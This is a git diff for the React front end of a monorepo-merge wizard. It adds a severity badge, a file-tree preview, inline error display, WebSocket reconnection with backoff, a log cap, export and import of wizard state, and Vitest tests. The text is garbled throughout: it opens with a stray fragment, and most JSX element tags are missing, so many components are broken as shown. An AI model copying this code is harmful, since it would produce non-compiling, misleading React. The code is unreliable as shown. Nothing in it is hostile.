{log.message} diff --git a/ui/src/components/SeverityBadge.tsx b/ui/src/components/SeverityBadge.tsx new file mode 100755 index 0000000..42118bc --- /dev/null +++ b/ui/src/components/SeverityBadge.tsx @@ -0,0 +1,30 @@ +import React from 'react'; + +interface SeverityBadgeProps { + severity: 'info' | 'warn' | 'error' | 'critical'; +} + +const COLORS: Record = { + info: { bg: '#e3f2fd', text: '#1565c0' }, + warn: { bg: '#fff3e0', text: '#e65100' }, + error: { bg: '#fce4ec', text: '#c62828' }, + critical: { bg: '#f3e5f5', text: '#6a1b9a' }, +}; + +export function SeverityBadge({ severity }: SeverityBadgeProps) { + const color = COLORS[severity] || COLORS.info; + return ( + + {severity} + + ); +} diff --git a/ui/src/components/TreePreview.tsx b/ui/src/components/TreePreview.tsx new file mode 100755 index 0000000..a9b38f4 --- /dev/null +++ b/ui/src/components/TreePreview.tsx @@ -0,0 +1,59 @@ +import React from 'react'; + +interface TreePreviewProps { + files: string[]; + title?: string; +} + +export function TreePreview({ files, title }: TreePreviewProps) { + // Build a tree structure from flat file paths + const tree = buildTree(files); + + return ( +
+ {title &&
{title}
} + {renderTree(tree, '')} +
+ ); +} + +interface TreeNode { + [key: string]: TreeNode | null; +} + +function buildTree(files: string[]): TreeNode { + const tree: TreeNode = {}; + for (const file of files.sort()) { + const parts = file.split('/'); + let current = tree; + for (let i = 0; i < parts.length; i++) { + const part = parts[i]; + if (i === parts.length - 1) { + current[part] = null; // leaf (file) + } else { + if (!current[part] || current[part] === null) { + current[part] = {}; + } + current = current[part] as TreeNode; + } + } + } + return tree; +} + +function renderTree(node: TreeNode, prefix: string): React.ReactNode { + const entries = Object.entries(node); + return entries.map(([name, child], i) => { + const isLast = i === entries.length - 1; + const connector = isLast ? '\u2514\u2500\u2500 ' : '\u251C\u2500\u2500 '; + const childPrefix = prefix + (isLast ? ' ' : '\u2502 '); + const isDir = child !== null; + + return ( + +
{prefix}{connector}{isDir ? `${name}/` : name}
+ {isDir && renderTree(child, childPrefix)} +
+ ); + }); +} diff --git a/ui/src/components/WizardStepper.test.tsx b/ui/src/components/WizardStepper.test.tsx new file mode 100644 index 0000000..66c6c66 --- /dev/null +++ b/ui/src/components/WizardStepper.test.tsx @@ -0,0 +1,36 @@ +import { fireEvent, render, screen } from '@testing-library/react'; +import { describe, expect, it, vi } from 'vitest'; +import { WizardStepper } from './WizardStepper'; + +const steps = [ + { id: 'assess', status: 'completed' as const }, + { id: 'prepare', status: 'in-progress' as const }, + { id: 'merge', status: 'pending' as const }, +]; + +describe('WizardStepper', () => { + it('renders step labels and status markers', () => { + render(); + + expect(screen.getByRole('button', { name: /Assess/i })).toBeInTheDocument(); + expect(screen.getByRole('button', { name: /Prepare/i })).toBeInTheDocument(); + expect(screen.getByRole('button', { name: /Merge/i })).toBeInTheDocument(); + expect(screen.getByText('ok')).toBeInTheDocument(); + expect(screen.getByText('...')).toBeInTheDocument(); + }); + + it('highlights the current step', () => { + render(); + + const current = screen.getByRole('button', { name: /Prepare/i }); + expect(current.className).toContain('active'); + }); + + it('calls onStepClick with the clicked step id', async () => { + const onStepClick = vi.fn(); + render(); + + fireEvent.click(screen.getByRole('button', { name: /Merge/i })); + expect(onStepClick).toHaveBeenCalledWith('merge'); + }); +}); diff --git a/ui/src/hooks/useOperation.test.tsx b/ui/src/hooks/useOperation.test.tsx new file mode 100644 index 0000000..0d0a883 --- /dev/null +++ b/ui/src/hooks/useOperation.test.tsx @@ -0,0 +1,104 @@ +import { act, renderHook, waitFor } from '@testing-library/react'; +import type { UseWebSocketReturn, WsEvent } from './useWebSocket'; +import { useOperation } from './useOperation'; + +type MockWebSocket = UseWebSocketReturn & { + subscribe: ReturnType; + cancel: ReturnType; + emit: (event: WsEvent) => void; +}; + +function 
createMockWebSocket(): MockWebSocket { + const handlers = new Set<(event: WsEvent) => void>(); + const subscribe = vi.fn(); + const cancel = vi.fn(); + + return { + connected: true, + reconnecting: false, + connectionFailed: false, + retryCount: 0, + maxRetries: 10, + subscribe, + cancel, + onEvent: (handler) => { + handlers.add(handler); + return () => { + handlers.delete(handler); + }; + }, + emit: (event) => { + for (const handler of handlers) { + handler(event); + } + }, + }; +} + +describe('useOperation', () => { + it('tracks operation lifecycle for the active operation id', async () => { + const ws = createMockWebSocket(); + const { result } = renderHook(() => useOperation(ws)); + + act(() => { + result.current.start('op-1'); + }); + + await waitFor(() => { + expect(result.current.opId).toBe('op-1'); + }); + + expect(ws.subscribe).toHaveBeenCalledWith('op-1'); + + act(() => { + ws.emit({ type: 'log', opId: 'other-op', message: 'ignore me' }); + ws.emit({ type: 'log', opId: 'op-1', level: 'warn', message: 'working' }); + ws.emit({ type: 'result', opId: 'op-1', data: { ok: true } }); + ws.emit({ type: 'error', opId: 'op-1', message: 'warning' }); + ws.emit({ type: 'done', opId: 'op-1' }); + }); + + expect(result.current.logs).toHaveLength(1); + expect(result.current.logs[0]).toEqual({ level: 'warn', message: 'working' }); + expect(result.current.result).toEqual({ ok: true }); + expect(result.current.error).toBe('warning'); + expect(result.current.isDone).toBe(true); + + act(() => { + result.current.cancel(); + }); + expect(ws.cancel).toHaveBeenCalledWith('op-1'); + + act(() => { + result.current.reset(); + }); + expect(result.current.opId).toBeNull(); + expect(result.current.logs).toEqual([]); + expect(result.current.result).toBeNull(); + expect(result.current.error).toBeNull(); + expect(result.current.isDone).toBe(false); + }); + + it('caps logs to the most recent 1000 entries', async () => { + const ws = createMockWebSocket(); + const { result } = 
renderHook(() => useOperation(ws)); + + act(() => { + result.current.start('op-logs'); + }); + + await waitFor(() => { + expect(result.current.opId).toBe('op-logs'); + }); + + act(() => { + for (let i = 0; i < 1005; i += 1) { + ws.emit({ type: 'log', opId: 'op-logs', message: `log-${i}` }); + } + }); + + expect(result.current.logs).toHaveLength(1000); + expect(result.current.logs[0]?.message).toBe('log-5'); + expect(result.current.logs[999]?.message).toBe('log-1004'); + }); +}); diff --git a/ui/src/hooks/useOperation.ts b/ui/src/hooks/useOperation.ts index 6df8acb..2954d13 100755 --- a/ui/src/hooks/useOperation.ts +++ b/ui/src/hooks/useOperation.ts @@ -13,6 +13,8 @@ interface OperationState { isDone: boolean; } +const MAX_LOGS = 1000; + export function useOperation(ws: UseWebSocketReturn) { const [opId, setOpId] = useState(null); const [state, setState] = useState({ @@ -34,11 +36,13 @@ export function useOperation(ws: UseWebSocketReturn) { setState((prev) => { switch (event.type) { - case 'log': - return { - ...prev, - logs: [...prev.logs, { level: event.level ?? 'info', message: event.message ?? '' }], - }; + case 'log': { + const newLog = { level: event.level ?? 'info', message: event.message ?? '' }; + const logs = prev.logs.length >= MAX_LOGS + ? [...prev.logs.slice(-MAX_LOGS + 1), newLog] + : [...prev.logs, newLog]; + return { ...prev, logs }; + } case 'result': return { ...prev, result: event.data ?? 
null }; case 'error': diff --git a/ui/src/hooks/useWebSocket.test.tsx b/ui/src/hooks/useWebSocket.test.tsx new file mode 100644 index 0000000..bd2faa8 --- /dev/null +++ b/ui/src/hooks/useWebSocket.test.tsx @@ -0,0 +1,130 @@ +import { act, renderHook } from '@testing-library/react'; +import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest'; +import { useWebSocket } from './useWebSocket'; + +class MockWebSocket { + static OPEN = 1; + static CLOSED = 3; + static instances: MockWebSocket[] = []; + + readyState = MockWebSocket.OPEN; + send = vi.fn(); + close = vi.fn(() => { + this.readyState = MockWebSocket.CLOSED; + this.onclose?.(new CloseEvent('close')); + }); + + onopen: ((event: Event) => void) | null = null; + onclose: ((event: CloseEvent) => void) | null = null; + onerror: ((event: Event) => void) | null = null; + onmessage: ((event: MessageEvent) => void) | null = null; + + constructor(public readonly url: string) { + MockWebSocket.instances.push(this); + } + + emitOpen(): void { + this.readyState = MockWebSocket.OPEN; + this.onopen?.(new Event('open')); + } + + emitClose(): void { + this.readyState = MockWebSocket.CLOSED; + this.onclose?.(new CloseEvent('close')); + } + + emitError(): void { + this.onerror?.(new Event('error')); + } + + emitMessage(data: string): void { + this.onmessage?.({ data } as MessageEvent); + } +} + +describe('useWebSocket', () => { + beforeEach(() => { + MockWebSocket.instances = []; + vi.useFakeTimers(); + vi.spyOn(Math, 'random').mockReturnValue(0); + vi.stubGlobal('WebSocket', MockWebSocket as unknown as typeof WebSocket); + }); + + afterEach(() => { + vi.restoreAllMocks(); + vi.unstubAllGlobals(); + vi.useRealTimers(); + }); + + it('connects and sends subscribe/cancel messages', async () => { + const { result } = renderHook(() => useWebSocket()); + const ws = MockWebSocket.instances[0]; + expect(ws).toBeDefined(); + + act(() => { + ws.emitOpen(); + }); + expect(result.current.connected).toBe(true); + + act(() => { + 
result.current.subscribe('op-1'); + result.current.cancel('op-1'); + }); + + expect(ws.send).toHaveBeenNthCalledWith(1, JSON.stringify({ type: 'subscribe', opId: 'op-1' })); + expect(ws.send).toHaveBeenNthCalledWith(2, JSON.stringify({ type: 'cancel', opId: 'op-1' })); + }); + + it('retries with exponential backoff and marks connection failed after max retries', async () => { + const { result } = renderHook(() => useWebSocket()); + const first = MockWebSocket.instances[0]; + + act(() => { + first.emitOpen(); + }); + expect(result.current.connected).toBe(true); + + for (let attempt = 1; attempt <= 11; attempt += 1) { + const current = MockWebSocket.instances.at(-1); + expect(current).toBeDefined(); + + act(() => { + current!.emitClose(); + }); + expect(result.current.retryCount).toBe(Math.min(attempt, 10)); + + if (attempt <= 10) { + const delay = Math.min(1000 * (2 ** (attempt - 1)), 30000); + act(() => { + vi.advanceTimersByTime(delay); + }); + expect(MockWebSocket.instances).toHaveLength(attempt + 1); + } + } + expect(result.current.connectionFailed).toBe(true); + expect(result.current.reconnecting).toBe(false); + expect(result.current.connected).toBe(false); + }); + + it('dispatches parsed events to listeners and ignores malformed messages', async () => { + const { result } = renderHook(() => useWebSocket()); + const ws = MockWebSocket.instances[0]; + const handler = vi.fn(); + + const unsubscribe = result.current.onEvent(handler); + + act(() => { + ws.emitMessage(JSON.stringify({ type: 'log', opId: 'op-1', message: 'hello' })); + ws.emitMessage('not-json'); + }); + + expect(handler).toHaveBeenCalledTimes(1); + expect(handler).toHaveBeenCalledWith({ type: 'log', opId: 'op-1', message: 'hello' }); + + unsubscribe(); + act(() => { + ws.emitMessage(JSON.stringify({ type: 'done', opId: 'op-1' })); + }); + expect(handler).toHaveBeenCalledTimes(1); + }); +}); diff --git a/ui/src/hooks/useWebSocket.ts b/ui/src/hooks/useWebSocket.ts index c2530cc..7562ab6 100755 --- 
a/ui/src/hooks/useWebSocket.ts +++ b/ui/src/hooks/useWebSocket.ts @@ -10,6 +10,10 @@ export interface WsEvent { export interface UseWebSocketReturn { connected: boolean; + reconnecting: boolean; + connectionFailed: boolean; + retryCount: number; + maxRetries: number; subscribe: (opId: string) => void; cancel: (opId: string) => void; onEvent: (handler: (event: WsEvent) => void) => () => void; @@ -19,23 +23,48 @@ export function useWebSocket(): UseWebSocketReturn { const wsRef = useRef(null); const handlersRef = useRef void>>(new Set()); const [connected, setConnected] = useState(false); + const [reconnecting, setReconnecting] = useState(false); + const [connectionFailed, setConnectionFailed] = useState(false); + const [retryCount, setRetryCount] = useState(0); useEffect(() => { let reconnectTimer: ReturnType; let ws: WebSocket; + let retryCount = 0; + const MAX_RETRIES = 10; + const BASE_DELAY = 1000; + let shuttingDown = false; function connect() { + if (shuttingDown) return; const protocol = window.location.protocol === 'https:' ? 
'wss:' : 'ws:'; const url = `${protocol}//${window.location.host}/ws`; ws = new WebSocket(url); wsRef.current = ws; - ws.onopen = () => setConnected(true); + ws.onopen = () => { + setConnected(true); + setReconnecting(false); + setConnectionFailed(false); + setRetryCount(0); + retryCount = 0; // reset on successful connection + }; ws.onclose = () => { + if (shuttingDown) return; setConnected(false); - // Reconnect after 2 seconds - reconnectTimer = setTimeout(connect, 2000); + if (retryCount < MAX_RETRIES) { + const delay = Math.min(BASE_DELAY * Math.pow(2, retryCount), 30000) + + Math.random() * 1000; + retryCount++; + setRetryCount(retryCount); + setReconnecting(true); + setConnectionFailed(false); + reconnectTimer = setTimeout(connect, delay); + } else { + setReconnecting(false); + setConnectionFailed(true); + } }; ws.onerror = () => { @@ -57,6 +86,7 @@ export function useWebSocket(): UseWebSocketReturn { connect(); return () => { + shuttingDown = true; clearTimeout(reconnectTimer); ws?.close(); }; @@ -83,5 +113,14 @@ export function useWebSocket(): UseWebSocketReturn { }; }, []); - return { connected, subscribe, cancel, onEvent }; + return { + connected, + reconnecting, + connectionFailed, + retryCount, + maxRetries: 10, + subscribe, + cancel, + onEvent, + }; } diff --git a/ui/src/hooks/useWizardState.test.tsx b/ui/src/hooks/useWizardState.test.tsx new file mode 100644 index 0000000..eeb25ac --- /dev/null +++ b/ui/src/hooks/useWizardState.test.tsx @@ -0,0 +1,129 @@ +import { act, renderHook, waitFor } from '@testing-library/react'; +import { describe, expect, it, beforeEach, vi } from 'vitest'; +import type { WizardState } from '../api/client'; +import { useWizardState } from './useWizardState'; +import * as api from '../api/client'; + +vi.mock('../api/client', () => ({ + getWizardState: vi.fn(), + putWizardState: vi.fn(), + initWizard: vi.fn(), +})); + +function makeState(overrides: Partial = {}): WizardState { + return { + version: 1, + createdAt: 
'2026-01-01T00:00:00.000Z', + updatedAt: '2026-01-01T00:00:00.000Z', + repos: ['./repo-a', './repo-b'], + currentStep: 'assess', + steps: [ + { id: 'assess', status: 'pending' }, + { id: 'prepare', status: 'pending' }, + ], + options: { + outputDir: './monorepo', + packagesDir: 'packages', + packageManager: 'pnpm', + conflictStrategy: 'highest', + workspaceTool: 'none', + }, + ...overrides, + }; +} + +describe('useWizardState', () => { + beforeEach(() => { + vi.clearAllMocks(); + vi.mocked(api.getWizardState).mockResolvedValue({ exists: true, state: makeState() }); + vi.mocked(api.putWizardState).mockResolvedValue({ ok: true }); + vi.mocked(api.initWizard).mockResolvedValue({ state: makeState({ currentStep: 'assess' }) }); + }); + + it('loads wizard state on mount', async () => { + const { result } = renderHook(() => useWizardState()); + + expect(result.current.loading).toBe(true); + + await waitFor(() => { + expect(result.current.loading).toBe(false); + expect(result.current.state?.currentStep).toBe('assess'); + }); + }); + + it('surfaces load errors', async () => { + vi.mocked(api.getWizardState).mockRejectedValue(new Error('boom')); + + const { result } = renderHook(() => useWizardState()); + + await waitFor(() => { + expect(result.current.loading).toBe(false); + expect(result.current.error).toBe('boom'); + expect(result.current.state).toBeNull(); + }); + }); + + it('saves full state via putWizardState', async () => { + const { result } = renderHook(() => useWizardState()); + await waitFor(() => expect(result.current.loading).toBe(false)); + + const next = makeState({ currentStep: 'prepare' }); + await act(async () => { + await result.current.save(next); + }); + + expect(api.putWizardState).toHaveBeenCalledWith(next); + expect(result.current.state?.currentStep).toBe('prepare'); + }); + + it('updates step state and persists', async () => { + const { result } = renderHook(() => useWizardState()); + await waitFor(() => expect(result.current.loading).toBe(false)); + 
+ await act(async () => { + await result.current.updateStep('assess', { status: 'completed' }); + }); + + const updated = result.current.state; + expect(updated?.steps.find((s) => s.id === 'assess')?.status).toBe('completed'); + expect(api.putWizardState).toHaveBeenCalledTimes(1); + }); + + it('goToStep updates current step and persists', async () => { + const { result } = renderHook(() => useWizardState()); + await waitFor(() => expect(result.current.loading).toBe(false)); + + await act(async () => { + await result.current.goToStep('prepare'); + }); + + expect(result.current.state?.currentStep).toBe('prepare'); + expect(api.putWizardState).toHaveBeenCalledTimes(1); + }); + + it('imports and exports wizard state', async () => { + const { result } = renderHook(() => useWizardState()); + await waitFor(() => expect(result.current.loading).toBe(false)); + + const exported = result.current.exportState(); + expect(exported).toBeTruthy(); + + const imported = makeState({ currentStep: 'prepare' }); + await act(async () => { + await result.current.importState(JSON.stringify(imported)); + }); + + expect(api.putWizardState).toHaveBeenCalledWith(imported); + expect(result.current.state?.currentStep).toBe('prepare'); + }); + + it('rejects invalid import payloads', async () => { + const { result } = renderHook(() => useWizardState()); + await waitFor(() => expect(result.current.loading).toBe(false)); + + await expect(result.current.importState('{ invalid json')).rejects.toThrow(/Invalid JSON/); + await expect(result.current.importState(JSON.stringify({ nope: true }))).rejects.toThrow( + 'Invalid wizard state format' + ); + }); +}); diff --git a/ui/src/hooks/useWizardState.ts b/ui/src/hooks/useWizardState.ts index f22b6ab..341ec8c 100755 --- a/ui/src/hooks/useWizardState.ts +++ b/ui/src/hooks/useWizardState.ts @@ -15,6 +15,8 @@ export interface UseWizardStateReturn { init: (repos: string[]) => Promise; updateStep: (stepId: string, partial: Partial) => Promise; goToStep: (stepId: 
string) => Promise; + exportState: () => string | null; + importState: (json: string) => Promise; } export function useWizardState(): UseWizardStateReturn { @@ -67,5 +69,27 @@ export function useWizardState(): UseWizardStateReturn { [state, save], ); - return { state, loading, error, save, init, updateStep, goToStep }; + const exportState = useCallback((): string | null => { + if (!state) return null; + return JSON.stringify(state, null, 2); + }, [state]); + + const importState = useCallback( + async (json: string) => { + try { + const parsed = JSON.parse(json) as WizardState; + if (!parsed.version || !parsed.steps || !Array.isArray(parsed.steps)) { + throw new Error('Invalid wizard state format'); + } + await save(parsed); + } catch (err) { + throw err instanceof SyntaxError + ? new Error('Invalid JSON: ' + err.message) + : err; + } + }, + [save], + ); + + return { state, loading, error, save, init, updateStep, goToStep, exportState, importState }; } diff --git a/ui/src/pages/ArchivePage.tsx b/ui/src/pages/ArchivePage.tsx index 5aa80b2..88b5c3b 100755 --- a/ui/src/pages/ArchivePage.tsx +++ b/ui/src/pages/ArchivePage.tsx @@ -49,7 +49,7 @@ export function ArchivePage({ repos, onComplete, onSkip }: ArchivePageProps) {
- {error &&
{error}
} + {error &&
{error}
} {result && (
diff --git a/ui/src/pages/AssessPage.tsx b/ui/src/pages/AssessPage.tsx index 42695bb..96cca1a 100755 --- a/ui/src/pages/AssessPage.tsx +++ b/ui/src/pages/AssessPage.tsx @@ -6,6 +6,8 @@ import { CliHint } from '../components/CliHint'; import { LogStream } from '../components/LogStream'; import { ExportButton } from '../components/ExportButton'; import { SkipButton } from '../components/SkipButton'; +import { FindingsFilter } from '../components/FindingsFilter'; +import { SeverityBadge } from '../components/SeverityBadge'; interface AssessPageProps { ws: UseWebSocketReturn; @@ -14,26 +16,47 @@ interface AssessPageProps { onSkip: (stepId: string, rationale: string) => void; } +interface ExtendedFinding { + id: string; + title: string; + severity: 'info' | 'warn' | 'error' | 'critical'; + suggestedAction?: string; +} + +interface ExtendedAnalysis { + environment?: ExtendedFinding[]; + tooling?: ExtendedFinding[]; + ci?: ExtendedFinding[]; + publishing?: ExtendedFinding[]; + repoRisks?: ExtendedFinding[]; + riskSummary?: { + classification: string; + }; +} + interface AnalyzeResult { packages: Array<{ name: string; version: string; repoName: string }>; conflicts: Array<{ name: string; severity: string }>; collisions: Array<{ path: string; sources: string[] }>; complexityScore: number; recommendations: string[]; + extendedAnalysis?: ExtendedAnalysis; } export function AssessPage({ ws, repos, onComplete, onSkip }: AssessPageProps) { const op = useOperation(ws); const [loading, setLoading] = useState(false); + const [error, setError] = useState(null); const handleAnalyze = async () => { if (repos.length === 0) return; + setError(null); setLoading(true); try { const { opId } = await postAnalyze(repos); op.start(opId); } catch (err) { - alert(err instanceof Error ? err.message : 'Request failed'); + setError(err instanceof Error ? 
err.message : 'Request failed'); } finally { setLoading(false); } @@ -61,7 +84,8 @@ export function AssessPage({ ws, repos, onComplete, onSkip }: AssessPageProps) { - {op.error &&
{op.error}
} + {error &&
{error}
} + {op.error &&
{op.error}
} {result && (
@@ -110,6 +134,39 @@ export function AssessPage({ ws, repos, onComplete, onSkip }: AssessPageProps) { )} + {/* Extended Analysis */} + {result?.extendedAnalysis && ( +
+

Extended Analysis

+ {[ + { label: 'Environment', findings: result.extendedAnalysis.environment }, + { label: 'Tooling', findings: result.extendedAnalysis.tooling }, + { label: 'CI/CD', findings: result.extendedAnalysis.ci }, + { label: 'Publishing', findings: result.extendedAnalysis.publishing }, + { label: 'Repo Risks', findings: result.extendedAnalysis.repoRisks }, + ].filter(s => s.findings && s.findings.length > 0).map(section => ( +
+

{section.label}

+ +
+ ))} + + {result.extendedAnalysis.riskSummary && ( +
+

Risk Classification

+ + + {result.extendedAnalysis.riskSummary.classification} + +
+ )} +
+ )} + diff --git a/ui/src/pages/ConfigurePage.tsx b/ui/src/pages/ConfigurePage.tsx index 7012555..7f7ebbe 100755 --- a/ui/src/pages/ConfigurePage.tsx +++ b/ui/src/pages/ConfigurePage.tsx @@ -7,6 +7,7 @@ import { CliHint } from '../components/CliHint'; import { LogStream } from '../components/LogStream'; import { ExportButton } from '../components/ExportButton'; import { SkipButton } from '../components/SkipButton'; +import { DiffViewer } from '../components/DiffViewer'; interface ConfigurePageProps { ws: UseWebSocketReturn; @@ -16,14 +17,22 @@ interface ConfigurePageProps { onSkip: (stepId: string, rationale: string) => void; } +interface ConfigurePatch { + path: string; + before?: string; + after: string; +} + interface ConfigureResult { scaffoldedFiles: Array<{ relativePath: string; description: string }>; skippedConfigs: Array<{ name: string; reason: string }>; + patches?: ConfigurePatch[]; } export function ConfigurePage({ ws, options, packageNames, onComplete, onSkip }: ConfigurePageProps) { const op = useOperation(ws); const [loading, setLoading] = useState(false); + const [error, setError] = useState(null); const [namesInput, setNamesInput] = useState(packageNames.join(', ')); const names = namesInput.split(/[\n,]/).map((s) => s.trim()).filter(Boolean); @@ -39,7 +48,7 @@ export function ConfigurePage({ ws, options, packageNames, onComplete, onSkip }: }); op.start(opId); } catch (err) { - alert(err instanceof Error ? err.message : 'Request failed'); + setError(err instanceof Error ? err.message : 'Request failed'); } finally { setLoading(false); } @@ -50,6 +59,7 @@ export function ConfigurePage({ ws, options, packageNames, onComplete, onSkip }: return (

4. Configure Workspace

+ {error &&
{error}
}
@@ -77,7 +87,7 @@ export function ConfigurePage({ ws, options, packageNames, onComplete, onSkip }: - {op.error &&
{op.error}
} + {op.error &&
{op.error}
} {result && (
@@ -105,6 +115,22 @@ export function ConfigurePage({ ws, options, packageNames, onComplete, onSkip }: )} + {result.patches && result.patches.length > 0 && ( + <> +

Config Patches ({result.patches.length})

+
+ {result.patches.map((patch, i) => ( + + ))} +
+ + )} + diff --git a/ui/src/pages/MergePage.test.tsx b/ui/src/pages/MergePage.test.tsx new file mode 100644 index 0000000..0302a9e --- /dev/null +++ b/ui/src/pages/MergePage.test.tsx @@ -0,0 +1,157 @@ +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react'; +import { beforeEach, describe, expect, it, vi } from 'vitest'; +import type { UseWebSocketReturn, WsEvent } from '../hooks/useWebSocket'; +import { MergePage } from './MergePage'; +import type { WizardGlobalOptions } from '../api/client'; +import * as api from '../api/client'; + +vi.mock('../api/client', () => ({ + postPlan: vi.fn(), + postApply: vi.fn(), +})); + +type MockWebSocket = UseWebSocketReturn & { + subscribe: ReturnType; + cancel: ReturnType; + emit: (event: WsEvent) => void; +}; + +function createMockWebSocket(): MockWebSocket { + const handlers = new Set<(event: WsEvent) => void>(); + const subscribe = vi.fn(); + const cancel = vi.fn(); + + return { + connected: true, + reconnecting: false, + connectionFailed: false, + retryCount: 0, + maxRetries: 10, + subscribe, + cancel, + onEvent: (handler) => { + handlers.add(handler); + return () => { + handlers.delete(handler); + }; + }, + emit: (event) => { + for (const handler of handlers) { + handler(event); + } + }, + }; +} + +const defaultOptions: WizardGlobalOptions = { + outputDir: './monorepo', + packagesDir: 'packages', + packageManager: 'pnpm', + conflictStrategy: 'highest', + workspaceTool: 'none', +}; + +describe('MergePage', () => { + beforeEach(() => { + vi.clearAllMocks(); + }); + + it('runs plan then apply flow and emits callbacks', async () => { + const ws = createMockWebSocket(); + vi.mocked(api.postPlan).mockResolvedValue({ opId: 'plan-op' }); + vi.mocked(api.postApply).mockResolvedValue({ opId: 'apply-op' }); + + const onPlanPathChange = vi.fn(); + const onPackageNamesChange = vi.fn(); + const onComplete = vi.fn(); + + render( + , + ); + + fireEvent.click(screen.getByRole('button', { name: 'Generate Plan' })); + 
+ await waitFor(() => { + expect(api.postPlan).toHaveBeenCalledWith(['./repo-a', './repo-b'], { + output: './monorepo', + packagesDir: 'packages', + conflictStrategy: 'highest', + packageManager: 'pnpm', + workspaceTool: 'none', + }); + expect(ws.subscribe).toHaveBeenCalledWith('plan-op'); + }); + + act(() => { + ws.emit({ + type: 'result', + opId: 'plan-op', + data: { + planPath: '/tmp/mono.plan.json', + plan: { + sources: [{ name: 'repo-a' }, { name: 'repo-b' }], + files: [{ relativePath: 'README.md', content: '# mono' }], + }, + }, + }); + ws.emit({ type: 'done', opId: 'plan-op' }); + }); + + await waitFor(() => { + expect(onPlanPathChange).toHaveBeenCalledWith('/tmp/mono.plan.json'); + expect(onPackageNamesChange).toHaveBeenCalledWith(['repo-a', 'repo-b']); + expect(screen.getByText(/Plan saved to/i)).toBeInTheDocument(); + }); + + fireEvent.click(screen.getByRole('button', { name: 'Proceed to Apply' })); + + fireEvent.click(screen.getByRole('button', { name: 'Apply Plan' })); + await waitFor(() => { + expect(api.postApply).toHaveBeenCalledWith('/tmp/mono.plan.json', './monorepo'); + expect(ws.subscribe).toHaveBeenCalledWith('apply-op'); + }); + + act(() => { + ws.emit({ type: 'result', opId: 'apply-op', data: { outputDir: './monorepo', packageCount: 2 } }); + ws.emit({ type: 'done', opId: 'apply-op' }); + }); + + await waitFor(() => { + expect(screen.getByRole('button', { name: 'Mark Complete & Continue' })).toBeInTheDocument(); + }); + + fireEvent.click(screen.getByRole('button', { name: 'Mark Complete & Continue' })); + expect(onComplete).toHaveBeenCalledTimes(1); + }); + + it('renders plan request errors inline', async () => { + const ws = createMockWebSocket(); + vi.mocked(api.postPlan).mockRejectedValue(new Error('Plan failed')); + + render( + , + ); + + fireEvent.click(screen.getByRole('button', { name: 'Generate Plan' })); + + await waitFor(() => { + expect(screen.getByRole('alert')).toHaveTextContent('Plan failed'); + }); + }); +}); diff --git 
a/ui/src/pages/MergePage.tsx b/ui/src/pages/MergePage.tsx index 91dccd3..92b72ea 100755 --- a/ui/src/pages/MergePage.tsx +++ b/ui/src/pages/MergePage.tsx @@ -1,4 +1,4 @@ -import { useState } from 'react'; +import { useState, useEffect } from 'react'; import type { UseWebSocketReturn } from '../hooks/useWebSocket'; import { useOperation } from '../hooks/useOperation'; import { postPlan, postApply } from '../api/client'; @@ -7,19 +7,21 @@ import { CliHint } from '../components/CliHint'; import { LogStream } from '../components/LogStream'; import { ExportButton } from '../components/ExportButton'; import { SkipButton } from '../components/SkipButton'; +import { TreePreview } from '../components/TreePreview'; interface MergePageProps { ws: UseWebSocketReturn; repos: string[]; options: WizardGlobalOptions; onPlanPathChange: (planPath: string) => void; + onPackageNamesChange: (names: string[]) => void; onComplete: () => void; onSkip: (stepId: string, rationale: string) => void; } type Phase = 'plan' | 'apply'; -export function MergePage({ ws, repos, options, onPlanPathChange, onComplete, onSkip }: MergePageProps) { +export function MergePage({ ws, repos, options, onPlanPathChange, onPackageNamesChange, onComplete, onSkip }: MergePageProps) { const [phase, setPhase] = useState('plan'); const planOp = useOperation(ws); const applyOp = useOperation(ws); @@ -39,7 +41,7 @@ export function MergePage({ ws, repos, options, onPlanPathChange, onComplete, on }); planOp.start(opId); } catch (err) { - alert(err instanceof Error ? err.message : 'Request failed'); + setError(err instanceof Error ? err.message : 'Request failed'); } finally { setLoading(false); } @@ -52,20 +54,31 @@ export function MergePage({ ws, repos, options, onPlanPathChange, onComplete, on const { opId } = await postApply(planPath, options.outputDir); applyOp.start(opId); } catch (err) { - alert(err instanceof Error ? err.message : 'Request failed'); + setError(err instanceof Error ? 
err.message : 'Request failed'); } finally { setLoading(false); } }; - const planResult = planOp.result as { planPath?: string; plan?: Record } | null; + const planResult = planOp.result as { planPath?: string; plan?: Record; operations?: Array<{ outputs?: string[] }> } | null; const applyResult = applyOp.result as { outputDir?: string; packageCount?: number } | null; + const [error, setError] = useState(null); - // Auto-set plan path when plan completes - if (planResult?.planPath && planPath !== planResult.planPath) { - setPlanPath(planResult.planPath); - onPlanPathChange(planResult.planPath); - } + // Auto-set plan path and extract package names when plan completes + useEffect(() => { + if (planResult?.planPath && planPath !== planResult.planPath) { + setPlanPath(planResult.planPath); + onPlanPathChange(planResult.planPath); + } + if (planResult?.plan?.sources && Array.isArray(planResult.plan.sources)) { + const names = (planResult.plan.sources as Array<{ name?: string }>) + .map((s) => s.name) + .filter((n): n is string => !!n); + if (names.length > 0) { + onPackageNamesChange(names); + } + } + }, [planResult?.planPath, planResult?.plan?.sources]); const planCliArgs = [ 'monorepo plan', ...repos, @@ -80,6 +93,7 @@ export function MergePage({ ws, repos, options, onPlanPathChange, onComplete, on return (

3. Merge Repositories

+ {error &&
{error}
}
- {planOp.error &&
{planOp.error}
} + {planOp.error &&
{planOp.error}
} {planResult && (
@@ -122,6 +136,17 @@ export function MergePage({ ws, repos, options, onPlanPathChange, onComplete, on
{JSON.stringify(planResult.plan, null, 2)}
)} + {planResult?.operations && ( +
+

Planned File Structure

+ op.outputs) + .flatMap((op: { outputs?: string[] }) => op.outputs!)} + title="Monorepo Structure" + /> +
+ )} @@ -157,7 +182,7 @@ export function MergePage({ ws, repos, options, onPlanPathChange, onComplete, on
- {applyOp.error &&
{applyOp.error}
} + {applyOp.error &&
{applyOp.error}
} {applyResult && (
diff --git a/ui/src/pages/OperatePage.tsx b/ui/src/pages/OperatePage.tsx index 9a29f1d..a1072a9 100755 --- a/ui/src/pages/OperatePage.tsx +++ b/ui/src/pages/OperatePage.tsx @@ -62,6 +62,72 @@ export function OperatePage({ steps, repos, options }: OperatePageProps) { +

Completion Summary

+
+

+ {completed} step{completed !== 1 ? 's' : ''} completed,{' '} + {skipped} skipped,{' '} + {pending} remaining. +

+ {skipped > 0 && ( +
+ Skipped steps: +
    + {steps.filter((s) => s.status === 'skipped').map((s) => ( +
